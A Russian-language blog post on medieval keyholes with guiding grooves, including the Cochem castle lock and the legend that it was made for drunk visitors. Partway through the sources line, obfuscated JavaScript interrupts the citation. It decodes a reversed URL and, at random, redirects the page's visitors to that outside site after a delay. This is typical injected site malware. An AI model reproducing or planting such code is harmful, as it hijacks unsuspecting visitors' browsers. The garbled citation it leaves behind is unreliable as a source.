Открыть замок – легко!

А знаете ли вы, как иногда бывает сложно попасть ключом в замочную скважину? Особенно, если в подъезде перегорела лампочка, или ноги не держат после ночной кутерьмы. Оказывается, существуют дверные замки со специальными желобками, которые приведут ваш ключ в точку назначения.

Но интересный факт заключается в том, что подобные дверные замки существовали уже в Средневековой Европе.

“Сундук Биллингфорда”, библиотека колледжа Корпус-Кристи Кембриджского университета

Их и сегодня можно встретить путешествуя по Германии. 

г. Пирна, земля Саксония

Однако, самая знаменитая подобная замочная скважина находится в замке Кохем, что расположен в долине реки Мозель, прославленной своим белым вином.

По легенде, которая особенно нравится экскурсоводам, местные кузнецы сделали ее такой специально, чтобы, несмотря на выпитое количество вина, ключ в нее все равно бы попадал. 

Если учитывать, что, например, в XIV столетии потребление вина на душу населения (включая грудных младенцев и беременных женщин) составляло 4,3 литра в день, то такая версия вполне имеет место быть. Но скорее всего, это все-таки связано с плохим освещением. 

Источники: Austin, G. Alcohol in Western Society from Antiquity tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to 1800; Википедия, Замок Кохем.

 

АрхитектураЕвропаЗамкиИзобретенияСлайдер